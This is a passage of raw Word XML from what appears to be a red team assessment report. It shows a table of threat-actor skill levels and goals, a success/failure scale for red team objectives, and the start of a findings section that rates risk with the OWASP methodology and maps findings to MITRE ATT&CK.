              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Unsophisticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1829" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D042895" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hackers, Taggers, and “Script Kiddies;” small, disaffected groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2395DEA8" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disrupt and/or embarrass the victimized organization or type of organization (e.g., a specific Department or the Federal government as a whole).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="14F3673A" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="444" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5120DEF7" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="811" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75167B53" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1829" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7A8617EF" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Individuals or small, loosely affiliated groups; political or ideological activists; terrorists; domestic insiders; industrial espionage; spammers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0551248A" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Obtain critical information and/or usurp or disrupt the organization’s business or mission functions for profit or ideological cause.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="4C743864" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="444" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58CBCC2C" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="811" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D64A55A" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1829" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="392840B7" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nation-state government entity; patriotic hacker group; sophisticated terrorist group; professional organized criminal enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58479035" w14:textId="0D30CDF9" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Increase knowledge of general </w:t>
            </w:r>
            <w:r w:rsidR="0049066F" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>infrastructure,</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> plant seeds for future attacks. Obtain or modify specific information and/or disrupt cyber resources, specifically resources associated with missions or even information types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="7F3EDAA3" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="444" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21A426D4" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="811" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="317245F8" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Significant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1829" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07F3025B" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Professional intelligence organization or military service operative.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="10AE0692" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Obtain specific, high value information; undermine or impede critical aspects of a mission, program, or enterprise; or place itself in a position to do so in the future.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="0BACE0D4" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="444" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2956A9FC" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="811" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CC3EB4E" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1829" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03270979" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nation-state military possibly supported by their intelligence service; very sophisticated and capable insurgent or terrorist group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BA31D6F" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Severely undermine or destroy an organization’s mission capabilities by disrupting or denying its use of cyber resources (e.g., information, ICT infrastructure and applications).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0239E3A7" w14:textId="6ED5383B" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc209809077"/>
      <w:bookmarkStart w:id="82" w:name="_Toc211963074"/>
      <w:bookmarkStart w:id="83" w:name="_Toc213253592"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Threat</w:t>
      </w:r>
      <w:r w:rsidR="0049066F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>kill level</w:t>
      </w:r>
      <w:r w:rsidR="0049066F" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="4BAFD87F" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc212654638"/>
      <w:bookmarkStart w:id="85" w:name="_Toc213253544"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Goals and objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="341155EE" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following scale is used to define the outcome of goals and objectives, which can be found in the management summary and in chapter 3:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="985"/>
        <w:gridCol w:w="7761"/>
      </w:tblGrid>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="17C46289" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="181A647A" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478D6E11" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="5B216951" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="6404EBDF" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD9BC81" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The Red Team was able to achieve the objective, demonstrating a potential risk or weakness.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00437E8D" w:rsidRPr="001019D3" w14:paraId="5AE49213" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
          </w:tcPr>
          <w:p w14:paraId="2BD23B11" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B30D192" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A66D5A">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The Red Team was unable to achieve the objective, typically due to effective security controls preventing the intended action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DC4BA0C" w14:textId="7C645D5D" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc209809078"/>
      <w:bookmarkStart w:id="87" w:name="_Toc211963075"/>
      <w:bookmarkStart w:id="88" w:name="_Toc213253593"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Success scale of goals and objectives.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="6AB9E219" w14:textId="77777777" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="006D2C8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45271A20" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00D51507">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc212654639"/>
      <w:bookmarkStart w:id="90" w:name="_Toc213253545"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="0822069C" w14:textId="24BBB583" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Security issues, vulnerabilities or weaknesses discovered during the Red Team campaign are documented in the report as findings. Each finding is reported with </w:t>
      </w:r>
      <w:r w:rsidR="004A6BBF" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">a rating on the </w:t>
      </w:r>
      <w:r w:rsidR="00F86C1B" w:rsidRPr="001019D3">
        <w:t>severity of the risk</w:t>
      </w:r>
      <w:r w:rsidR="004A6BBF" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">based </w:t>
      </w:r>
      <w:r w:rsidR="00EF6C98" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on the OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00A66D5A" w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00EF6C98" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">isk </w:t>
      </w:r>
      <w:r w:rsidR="00A66D5A" w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00EF6C98" w:rsidRPr="001019D3">
        <w:t>ating methodology</w:t>
      </w:r>
      <w:r w:rsidR="00EF3370" w:rsidRPr="001019D3">
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidR="00EF3370" w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidR="00EF3370" w:rsidRPr="001019D3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004A6BBF" w:rsidRPr="001019D3">
        <w:t>, i</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>t also provides a description, mapping to MITRE ATT&amp;CK tactics (TA) and techniques (T), the affected systems, and one or several recommendations to address the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D7DC1" w14:textId="39CCC9F1" w:rsidR="00BC6EA4" w:rsidRPr="001019D3" w:rsidRDefault="00D5013B" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00F86C1B" w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">isk </w:t>
      </w:r>
      <w:r w:rsidR="00F86C1B" w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ating </w:t>
      </w:r>
      <w:r w:rsidR="00EF3370" w:rsidRPr="001019D3">
        <w:t>methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> is a structured framework used to evaluate and prioritize security risks in </w:t>
      </w:r>
      <w:r w:rsidR="00A66D5A" w:rsidRPr="001019D3">
        <w:t>systems</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. It helps organizations assess the severity of a potential threat by </w:t>
      </w:r>
      <w:r w:rsidR="00456F42" w:rsidRPr="001019D3">
        <w:t>analysing</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> two main factors: likelihood and impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1A715" w14:textId="143B92BB" w:rsidR="004A6BBF" w:rsidRPr="001019D3" w:rsidRDefault="004A6BBF" w:rsidP="004A6BBF">
      <w:pPr>
        <w:pStyle w:val="MacroText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Risk = Likelihood * Impact</w:t>
      </w:r>
    </w:p>
